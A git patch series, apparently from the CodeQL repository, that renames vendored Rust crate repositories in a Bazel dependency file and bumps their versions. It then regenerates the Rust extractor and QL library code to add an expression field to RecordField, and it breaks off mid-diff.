@@ -3234,7 +3265,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_gnullvm-0.52.6", + name = "vendor_ts__windows_aarch64_gnullvm-0.52.6", sha256 = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_gnullvm/0.52.6/download"], @@ -3244,7 +3275,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_msvc-0.48.5", + name = "vendor_ts__windows_aarch64_msvc-0.48.5", sha256 = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_msvc/0.48.5/download"], @@ -3254,7 +3285,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_msvc-0.52.6", + name = "vendor_ts__windows_aarch64_msvc-0.52.6", sha256 = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_msvc/0.52.6/download"], @@ -3264,7 +3295,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_gnu-0.48.5", + name = "vendor_ts__windows_i686_gnu-0.48.5", sha256 = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_gnu/0.48.5/download"], @@ -3274,7 +3305,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_gnu-0.52.6", + name = "vendor_ts__windows_i686_gnu-0.52.6", sha256 = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_gnu/0.52.6/download"], 
@@ -3284,7 +3315,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_gnullvm-0.52.6", + name = "vendor_ts__windows_i686_gnullvm-0.52.6", sha256 = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_gnullvm/0.52.6/download"], @@ -3294,7 +3325,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_msvc-0.48.5", + name = "vendor_ts__windows_i686_msvc-0.48.5", sha256 = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_msvc/0.48.5/download"], @@ -3304,7 +3335,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_i686_msvc-0.52.6", + name = "vendor_ts__windows_i686_msvc-0.52.6", sha256 = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_i686_msvc/0.52.6/download"], @@ -3314,7 +3345,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnu-0.48.5", + name = "vendor_ts__windows_x86_64_gnu-0.48.5", sha256 = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnu/0.48.5/download"], @@ -3324,7 +3355,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnu-0.52.6", + name = "vendor_ts__windows_x86_64_gnu-0.52.6", sha256 = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnu/0.52.6/download"], 
@@ -3334,7 +3365,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnullvm-0.48.5", + name = "vendor_ts__windows_x86_64_gnullvm-0.48.5", sha256 = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnullvm/0.48.5/download"], @@ -3344,7 +3375,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_gnullvm-0.52.6", + name = "vendor_ts__windows_x86_64_gnullvm-0.52.6", sha256 = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_gnullvm/0.52.6/download"], @@ -3354,7 +3385,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_msvc-0.48.5", + name = "vendor_ts__windows_x86_64_msvc-0.48.5", sha256 = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_msvc/0.48.5/download"], @@ -3364,7 +3395,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_x86_64_msvc-0.52.6", + name = "vendor_ts__windows_x86_64_msvc-0.52.6", sha256 = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_x86_64_msvc/0.52.6/download"], 
@@ -3374,17 +3405,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winnow-0.6.24", - sha256 = "c8d71a593cc5c42ad7876e2c1fda56f314f3754c084128833e64f1345ff8a03a", + name = "vendor_ts__winnow-0.7.3", + sha256 = "0e7f4ea97f6f78012141bcdb6a216b2609f0979ada50b20ca5b52dde2eac2bb1", type = "tar.gz", - urls = ["https://static.crates.io/crates/winnow/0.6.24/download"], - strip_prefix = "winnow-0.6.24", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.winnow-0.6.24.bazel"), + urls = ["https://static.crates.io/crates/winnow/0.7.3/download"], + strip_prefix = "winnow-0.7.3", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.winnow-0.7.3.bazel"), ) maybe( http_archive, - name = "vendor__yansi-1.0.1", + name = "vendor_ts__wit-bindgen-rt-0.33.0", + sha256 = "3268f3d866458b787f390cf61f4bbb563b922d091359f9608842999eaee3943c", + type = "tar.gz", + urls = ["https://static.crates.io/crates/wit-bindgen-rt/0.33.0/download"], + strip_prefix = "wit-bindgen-rt-0.33.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.wit-bindgen-rt-0.33.0.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__yansi-1.0.1", sha256 = "cfe53a6657fd280eaa890a3bc59152892ffa3e30101319d168b781ed6529b049", type = "tar.gz", urls = ["https://static.crates.io/crates/yansi/1.0.1/download"], @@ -3394,7 +3435,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__zerocopy-0.7.35", + name = "vendor_ts__zerocopy-0.7.35", sha256 = "1b9b4fd18abc82b8136838da5d50bae7bdea537c574d8dc1a34ed098d6c166f0", type = "tar.gz", urls = ["https://static.crates.io/crates/zerocopy/0.7.35/download"], 
@@ -3404,7 +3445,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__zerocopy-derive-0.7.35", + name = "vendor_ts__zerocopy-0.8.20", + sha256 = "dde3bb8c68a8f3f1ed4ac9221aad6b10cece3e60a8e2ea54a6a2dec806d0084c", + type = "tar.gz", + urls = ["https://static.crates.io/crates/zerocopy/0.8.20/download"], + strip_prefix = "zerocopy-0.8.20", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.zerocopy-0.8.20.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__zerocopy-derive-0.7.35", sha256 = "fa4f8080344d4671fb4e831a13ad1e68092748387dfc4f55e356242fae12ce3e", type = "tar.gz", urls = ["https://static.crates.io/crates/zerocopy-derive/0.7.35/download"], 
@@ -3412,56 +3463,66 @@ def crate_repositories(): build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.zerocopy-derive-0.7.35.bazel"), ) + maybe( + http_archive, + name = "vendor_ts__zerocopy-derive-0.8.20", + sha256 = "eea57037071898bf96a6da35fd626f4f27e9cee3ead2a6c703cf09d472b2e700", + type = "tar.gz", + urls = ["https://static.crates.io/crates/zerocopy-derive/0.8.20/download"], + strip_prefix = "zerocopy-derive-0.8.20", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.zerocopy-derive-0.8.20.bazel"), + ) + return [ - struct(repo = "vendor__anyhow-1.0.95", is_dev_dep = False), - struct(repo = "vendor__argfile-0.2.1", is_dev_dep = False), - struct(repo = "vendor__chrono-0.4.39", is_dev_dep = False), - struct(repo = "vendor__clap-4.5.26", is_dev_dep = False), - struct(repo = "vendor__dunce-1.0.5", is_dev_dep = False), - struct(repo = "vendor__either-1.13.0", is_dev_dep = False), - struct(repo = "vendor__encoding-0.2.33", is_dev_dep = False), - struct(repo = "vendor__figment-0.10.19", is_dev_dep = False), - struct(repo = "vendor__flate2-1.0.35", is_dev_dep = False), - struct(repo = "vendor__glob-0.3.2", is_dev_dep = False), - struct(repo = "vendor__globset-0.4.15", is_dev_dep = False), - struct(repo = "vendor__itertools-0.14.0", is_dev_dep = False), - struct(repo = "vendor__lazy_static-1.5.0", is_dev_dep = False), - struct(repo = "vendor__mustache-0.9.0", is_dev_dep = False), - struct(repo = "vendor__num-traits-0.2.19", is_dev_dep = False), - struct(repo = "vendor__num_cpus-1.16.0", is_dev_dep = False), - struct(repo = "vendor__proc-macro2-1.0.93", is_dev_dep = False), - struct(repo = "vendor__quote-1.0.38", is_dev_dep = False), - struct(repo = "vendor__ra_ap_base_db-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_cfg-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_hir-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_hir_def-0.0.258", is_dev_dep = False), - struct(repo = 
"vendor__ra_ap_hir_expand-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_ide_db-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_intern-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_load-cargo-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_parser-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_paths-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_project_model-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_span-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_stdx-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_syntax-0.0.258", is_dev_dep = False), - struct(repo = "vendor__ra_ap_vfs-0.0.258", is_dev_dep = False), - struct(repo = "vendor__rayon-1.10.0", is_dev_dep = False), - struct(repo = "vendor__regex-1.11.1", is_dev_dep = False), - struct(repo = "vendor__serde-1.0.217", is_dev_dep = False), - struct(repo = "vendor__serde_json-1.0.135", is_dev_dep = False), - struct(repo = "vendor__serde_with-3.12.0", is_dev_dep = False), - struct(repo = "vendor__syn-2.0.96", is_dev_dep = False), - struct(repo = "vendor__toml-0.8.19", is_dev_dep = False), - struct(repo = "vendor__tracing-0.1.41", is_dev_dep = False), - struct(repo = "vendor__tracing-flame-0.2.0", is_dev_dep = False), - struct(repo = "vendor__tracing-subscriber-0.3.19", is_dev_dep = False), - struct(repo = "vendor__tree-sitter-0.24.6", is_dev_dep = False), - struct(repo = "vendor__tree-sitter-embedded-template-0.23.2", is_dev_dep = False), - struct(repo = "vendor__tree-sitter-ruby-0.23.1", is_dev_dep = False), - struct(repo = "vendor__triomphe-0.1.14", is_dev_dep = False), - struct(repo = "vendor__ungrammar-1.16.1", is_dev_dep = False), - struct(repo = "vendor__rand-0.8.5", is_dev_dep = True), - struct(repo = "vendor__tree-sitter-json-0.24.8", is_dev_dep = True), - struct(repo = "vendor__tree-sitter-ql-0.23.1", is_dev_dep = True), + struct(repo = "vendor_ts__anyhow-1.0.96", is_dev_dep = 
False), + struct(repo = "vendor_ts__argfile-0.2.1", is_dev_dep = False), + struct(repo = "vendor_ts__chrono-0.4.39", is_dev_dep = False), + struct(repo = "vendor_ts__clap-4.5.31", is_dev_dep = False), + struct(repo = "vendor_ts__dunce-1.0.5", is_dev_dep = False), + struct(repo = "vendor_ts__either-1.14.0", is_dev_dep = False), + struct(repo = "vendor_ts__encoding-0.2.33", is_dev_dep = False), + struct(repo = "vendor_ts__figment-0.10.19", is_dev_dep = False), + struct(repo = "vendor_ts__flate2-1.1.0", is_dev_dep = False), + struct(repo = "vendor_ts__glob-0.3.2", is_dev_dep = False), + struct(repo = "vendor_ts__globset-0.4.15", is_dev_dep = False), + struct(repo = "vendor_ts__itertools-0.14.0", is_dev_dep = False), + struct(repo = "vendor_ts__lazy_static-1.5.0", is_dev_dep = False), + struct(repo = "vendor_ts__mustache-0.9.0", is_dev_dep = False), + struct(repo = "vendor_ts__num-traits-0.2.19", is_dev_dep = False), + struct(repo = "vendor_ts__num_cpus-1.16.0", is_dev_dep = False), + struct(repo = "vendor_ts__proc-macro2-1.0.93", is_dev_dep = False), + struct(repo = "vendor_ts__quote-1.0.38", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_base_db-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_cfg-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_hir-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_hir_def-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_hir_expand-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_ide_db-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_intern-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_load-cargo-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_parser-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_paths-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_project_model-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_span-0.0.266", is_dev_dep = False), 
+ struct(repo = "vendor_ts__ra_ap_stdx-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_syntax-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__ra_ap_vfs-0.0.266", is_dev_dep = False), + struct(repo = "vendor_ts__rayon-1.10.0", is_dev_dep = False), + struct(repo = "vendor_ts__regex-1.11.1", is_dev_dep = False), + struct(repo = "vendor_ts__serde-1.0.218", is_dev_dep = False), + struct(repo = "vendor_ts__serde_json-1.0.139", is_dev_dep = False), + struct(repo = "vendor_ts__serde_with-3.12.0", is_dev_dep = False), + struct(repo = "vendor_ts__syn-2.0.98", is_dev_dep = False), + struct(repo = "vendor_ts__toml-0.8.20", is_dev_dep = False), + struct(repo = "vendor_ts__tracing-0.1.41", is_dev_dep = False), + struct(repo = "vendor_ts__tracing-flame-0.2.0", is_dev_dep = False), + struct(repo = "vendor_ts__tracing-subscriber-0.3.19", is_dev_dep = False), + struct(repo = "vendor_ts__tree-sitter-0.24.6", is_dev_dep = False), + struct(repo = "vendor_ts__tree-sitter-embedded-template-0.23.2", is_dev_dep = False), + struct(repo = "vendor_ts__tree-sitter-ruby-0.23.1", is_dev_dep = False), + struct(repo = "vendor_ts__triomphe-0.1.14", is_dev_dep = False), + struct(repo = "vendor_ts__ungrammar-1.16.1", is_dev_dep = False), + struct(repo = "vendor_ts__rand-0.9.0", is_dev_dep = True), + struct(repo = "vendor_ts__tree-sitter-json-0.24.8", is_dev_dep = True), + struct(repo = "vendor_ts__tree-sitter-ql-0.23.1", is_dev_dep = True), ] From cbae16b3928ad1770fa55ec06d69d5fb9534e4de Mon Sep 17 00:00:00 2001 
From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:29:17 +0100 Subject: [PATCH 032/892] Rust: rerun code generation --- rust/extractor/src/generated/.generated.list | 2 +- rust/extractor/src/generated/top.rs | 4 ++++ rust/extractor/src/translate/generated.rs | 2 ++ rust/ql/.generated.list | 11 ++++++----- rust/ql/.gitattributes | 1 + rust/ql/lib/codeql/rust/elements/RecordField.qll | 1 + .../elements/internal/generated/ParentChild.qll | 11 ++++++++--- .../rust/elements/internal/generated/Raw.qll | 5 +++++ .../elements/internal/generated/RecordField.qll | 14 ++++++++++++++ rust/ql/lib/rust.dbscheme | 6 ++++++ .../generated/RecordField/RecordField.ql | 9 ++++++--- .../generated/RecordField/RecordField_getExpr.ql | 7 +++++++ rust/schema/ast.py | 1 + 13 files changed, 62 insertions(+), 12 deletions(-) create mode 100644 rust/ql/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql diff --git a/rust/extractor/src/generated/.generated.list b/rust/extractor/src/generated/.generated.list index 6aaea33eac5c..528da1d56714 100644 --- a/rust/extractor/src/generated/.generated.list +++ b/rust/extractor/src/generated/.generated.list @@ -1,2 +1,2 @@ mod.rs 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 -top.rs 18702be33d768cc6f723201fce8c2bf2125df192c0336db9711a99f8fa7b074f 18702be33d768cc6f723201fce8c2bf2125df192c0336db9711a99f8fa7b074f +top.rs da0f43b99d3a173520048275597e2b052a7351f6fcb2ad5fc912257976742bb7 da0f43b99d3a173520048275597e2b052a7351f6fcb2ad5fc912257976742bb7 diff --git a/rust/extractor/src/generated/top.rs b/rust/extractor/src/generated/top.rs index fe5a9cd8ee38..2774193823aa 100644 --- a/rust/extractor/src/generated/top.rs +++ b/rust/extractor/src/generated/top.rs @@ -2185,6 +2185,7 @@ impl From> for trap::Label { pub struct RecordField { pub id: trap::TrapId, pub attrs: Vec>, + pub expr: Option>, pub name: Option>, pub type_repr: Option>, pub visibility: Option>, 
@@ -2200,6 +2201,9 @@ impl trap::TrapEntry for RecordField { for (i, v) in self.attrs.into_iter().enumerate() { out.add_tuple("record_field_attrs", vec![id.into(), i.into(), v.into()]); } + if let Some(v) = self.expr { + out.add_tuple("record_field_exprs", vec![id.into(), v.into()]); + } if let Some(v) = self.name { out.add_tuple("record_field_names", vec![id.into(), v.into()]); } diff --git a/rust/extractor/src/translate/generated.rs b/rust/extractor/src/translate/generated.rs index dc4828e078f9..249027eefa92 100644 --- a/rust/extractor/src/translate/generated.rs +++ b/rust/extractor/src/translate/generated.rs @@ -1849,12 +1849,14 @@ impl Translator<'_> { pub(crate) fn emit_record_field(&mut self, node: ast::RecordField) -> Option> { if self.should_be_excluded(&node) { return None; } let attrs = node.attrs().filter_map(|x| self.emit_attr(x)).collect(); + let expr = node.expr().and_then(|x| self.emit_expr(x)); let name = node.name().and_then(|x| self.emit_name(x)); let type_repr = node.ty().and_then(|x| self.emit_type(x)); let visibility = node.visibility().and_then(|x| self.emit_visibility(x)); let label = self.trap.emit(generated::RecordField { id: TrapId::Star, attrs, + expr, name, type_repr, visibility, diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index c8195b8a7664..6e7a2892a418 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list 
@@ -131,7 +131,7 @@ lib/codeql/rust/elements/RangePat.qll b5c0cfc84b8a767d58593fa7102dcf4be3ff8b02ba lib/codeql/rust/elements/RecordExpr.qll b8541a33ef408f2070103c1db8b6ec845bc6b1d8c810f5d8d208e5eeb9f86b30 a6d9602a64c9acf48f033f06fe7e1d86382512fd378ee3044f1126726847f696 lib/codeql/rust/elements/RecordExprField.qll edac04146849e2aeca27e7bbb896c21aa2e2b15736b1e8a06ac51ab01433b3ac 7c062bd6d5dd5b1d972450fb0b3272cd9b45f94ccd668c3bd4347e2dce3279ed lib/codeql/rust/elements/RecordExprFieldList.qll 672c3854cb84090c8a2e9311c43448016dc2614ecbf86dbe404156304674e38f 01ae0ffca0bf640c61120e36fcf2c560555f4aabbd49ddce6f5c1a3561dbfc31 -lib/codeql/rust/elements/RecordField.qll 87d68aa912574596ba09ecb3ab437472635cd76eff49cd5bef00eaabbd264f08 01871ee4dd9bd02acd981fbc109abfa4ee1b303deaa148484476317c4c41c924 +lib/codeql/rust/elements/RecordField.qll 5d23e25985857e37ab7d699a6298d842751da9fb46da341378e17fd7cef66cc8 59272d720dbbad02094f98bf8cf3372974eb449843522b5f510c1f1b01bd2834 lib/codeql/rust/elements/RecordFieldList.qll cebab3fba41221e61cda801070a7f414b62b4fbcf2206e35462c0da35ad75c3f db092d47eea871d61541b9711d7139a99394e0ed83901a8ae60f03dfa8ed722f lib/codeql/rust/elements/RecordPat.qll 3e31af707f72e9af42142e54b7251da8cbc88a9d5f448a4e6b3ca578f92f5680 0b459d751c26a062608ef0b6f3859e9ed1342e129b004ec218694d011955cfbd lib/codeql/rust/elements/RecordPatField.qll 7487461887e82bcf224b02628dfc64457121ab17e731e2dc7aa7e731ab16c02f f2018e55722245eb4273fb067242aaa503c43f91671a55b3a4bb51fe7bc0a03c 
@@ -574,7 +574,7 @@ lib/codeql/rust/elements/internal/generated/ParamList.qll c808c9d84dd7800573832b lib/codeql/rust/elements/internal/generated/ParenExpr.qll bc0731505bfe88516205ec360582a4222d2681d11342c93e15258590ddee82f2 d4bd6e0c80cf1d63746c88d4bcb3a01d4c75732e5da09e3ebd9437ced227fb60 lib/codeql/rust/elements/internal/generated/ParenPat.qll 4f168ef5d5bb87a903251cc31b2e44a759b099ec69c90af31783fbb15778c940 0e34f94a45a13396fd57d94c245dc64d1adde2ab0e22b56946f7e94c04e297fc lib/codeql/rust/elements/internal/generated/ParenTypeRepr.qll 40ab5c592e7699c621787793743e33988de71ff42ca27599f5ab3ddb70e3f7d8 12c0a6eed2202ee3e892f61da3b3ce77ac3190854cdf3097e8d2be98aa3cb91d -lib/codeql/rust/elements/internal/generated/ParentChild.qll 1df63bfa8268f7db25eab70abedb8d424d892b56e92ceee8c7900cd33b1af07f cfa3d31a89303e60f4ed60ed5ca5fd04973202828aa674205d333f9fa784705f +lib/codeql/rust/elements/internal/generated/ParentChild.qll 2992505ffc3279d58f2d03e89ec0f7d23aedebb3c3baf990bfbda894a6cc10e8 2f6b721e8244b444b47d41c2303fea166debee208544389c4dd9f2be0d62fe43 lib/codeql/rust/elements/internal/generated/ParenthesizedArgList.qll c5fa328ea60d3a3333d7c7bb3480969c1873166c7ac8ebb9d0afad7a8099d1a8 2dbbb6200d96f7db7dea4a55bdeab8d67b14d39a43e0bd54ada019f7e466f163 lib/codeql/rust/elements/internal/generated/Pat.qll 3605ac062be2f294ee73336e9669027b8b655f4ad55660e1eab35266275154ee 7f9400db2884d336dd1d21df2a8093759c2a110be9bf6482ce8e80ae0fd74ed4 lib/codeql/rust/elements/internal/generated/Path.qll 8e47e91aff3f8c60f1ee8cb3887b8e4936c38e4665d052f2c92a939a969aac29 2c28beb89cabd7c7c91a5bc65c874f414cb96bbefde37b25811b61089a8a0053 
@@ -589,11 +589,11 @@ lib/codeql/rust/elements/internal/generated/PtrTypeRepr.qll 51d1e9e683fc79dddbff lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll 80826a6a6868a803aa2372e31c52a03e1811a3f1f2abdb469f91ca0bfdd9ecb6 34ee1e208c1690cba505dff2c588837c0cd91e185e2a87d1fe673191962276a9 -lib/codeql/rust/elements/internal/generated/Raw.qll 17037cbf4b911c74b45453d733726218512c5c8f5e890a6f0e3290fab894a237 5fb11b239f210c30823b8862385f8b9f459ef8b62d47b6b50ba560e4ce2cac7c +lib/codeql/rust/elements/internal/generated/Raw.qll cfbf960b83fc7f659214a48ced60001366410322a116de255678dec9d765d8dd c0d1ee182ccb916dedf33a272fb37ac394e0fac95ef4fadb8a93c7db8d11feb5 lib/codeql/rust/elements/internal/generated/RecordExpr.qll 2131b2cb336caa76170082e69776011bf02576bbfdd34ba68ca84af24209250a 39a2e3ec32352b594c43cc1295e0e8b3f9808173322d3d73cb7d48ef969d5565 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 -lib/codeql/rust/elements/internal/generated/RecordField.qll 6d4b184c85419f9282937ebd1b1d14930a263e8754124f2323953991ca0f0e59 2f8bec227f960ae98fc320a65efdfdc5dc04455cd59697e2621585e5a5f942b8 +lib/codeql/rust/elements/internal/generated/RecordField.qll 7a6fd6a8362ea1671560eeb96abcaf9ae412ec9800fcf9c9fbda1849253912af 
0e72e067475c20d72aeae2f10589e3f25806b44ac60b6b7289ba860de98a7c92 lib/codeql/rust/elements/internal/generated/RecordFieldList.qll d7bb2677338cf420b0d6371aeec781aacc2272c73413ea96b7418177ad149fb9 5ef52074b9f4ec31e7422b70efdb2e650d673b2625efdfec18a4e48c30e35cf6 lib/codeql/rust/elements/internal/generated/RecordPat.qll f2ce392fb7e481a139ea527ad32d1c7ba65404a05efc56f5c68ce1e8e1e0a928 9710048cd1e6b26b3054ac95778e47f16cff6424bab9ef0c099c1109ef14741f lib/codeql/rust/elements/internal/generated/RecordPatField.qll 5bf624d22903fb874e6d03541cf453493badd382b6910ce950ad0d34dd580e9a b9ec89b69a58b9c418405efa9b0e6ee7b07616f5696a0858583a339d657b5855 
@@ -1029,8 +1029,9 @@ test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList.ql b6cd65 test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getAttr.ql 15b297e79c1ba8c92cb97148d6aab78ed1fd2c94f0d3a430ead8d541024e81ce 4f0a131011cf32e172f7bd027769e39642fb506d37b3d50b175c6ed5947d3d9c test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getField.ql c55e4775c8880c05944be04bdeb1c9e6bad45b922ba71ac3145acd83ff988e59 14ce98d1e5564e9e27c29110237cf6210d130ea887920b2b1bd34a853b7fcc63 test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getSpread.ql f2dd6b85da1cd8195986aefbe7dc8171db6fbbe5b2612c4cbdd8aba052cb0c6a 2c19cb1510c215ddfa004d40bf30fc0fe0dcbb530c320b297541f1dbcb204143 -test/extractor-tests/generated/RecordField/RecordField.ql b1f14a17b6f2e581c2a1e882a7405351ded14c565375b99a0119fafed93a2b09 b7d74549a4f7556e79fcbdb79748905fb13d13cd01de3d551cb5898b1d0af87a +test/extractor-tests/generated/RecordField/RecordField.ql 8ba8ed51144c69266f8a5644604f560d1569de76e1070d8f22247d07ebc521c8 87d485651f9711e49c576dddd543077c49892b71e45fc65ce5122ded303b49f5 test/extractor-tests/generated/RecordField/RecordField_getAttr.ql aa29d317dee23039a807df530a6f04b0678c4d1d34207a4381be535ff04af478 41c5778d6316eec19192334046ed110aea44a4c45937d5c355a9b71c54aa8e04 +test/extractor-tests/generated/RecordField/RecordField_getExpr.ql 15ab939ede4ed4395ef8db8f6e0a3ac03079a3ae617ce9335fb93ba565b402de 9d853f305baf56ec08b22342adc4deb096d771fa48fd478932cc5187cd66304f test/extractor-tests/generated/RecordField/RecordField_getName.ql 1f5c47d41367bd0115df86f22a70d4621d7cbfb41554daa598da29f549479670 64535303b273f1c2027b6ce89b50816ad3cbbca9bf00b2b8402e36b26e675d97 test/extractor-tests/generated/RecordField/RecordField_getTypeRepr.ql f61cfcd0c682604b882a4ed9c746e6f6087e4798d7aaf9d29579e0e2372406e6 01371887fa82748ef196d2e9d27d26c586efb5b4f82d48967b5494723c54af4d test/extractor-tests/generated/RecordField/RecordField_getVisibility.ql 
cc45e9bb9418d15cef07a1827358c3f18a8737324c8e6852591a2da70df89360 45557497fc165a212fffda71dedabc8159a4f72323430df732698a18922b366c diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index 4d5b319bc367..05ac0fbbf272 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes @@ -1033,6 +1033,7 @@ /test/extractor-tests/generated/RecordExprFieldList/RecordExprFieldList_getSpread.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getAttr.ql linguist-generated +/test/extractor-tests/generated/RecordField/RecordField_getExpr.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getName.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getTypeRepr.ql linguist-generated /test/extractor-tests/generated/RecordField/RecordField_getVisibility.ql linguist-generated diff --git a/rust/ql/lib/codeql/rust/elements/RecordField.qll b/rust/ql/lib/codeql/rust/elements/RecordField.qll index 4a5e749b9050..d19a605dad97 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordField.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordField.qll @@ -6,6 +6,7 @@ private import internal.RecordFieldImpl import codeql.rust.elements.AstNode import codeql.rust.elements.Attr +import codeql.rust.elements.Expr import codeql.rust.elements.Name import codeql.rust.elements.TypeRepr import codeql.rust.elements.Visibility diff --git 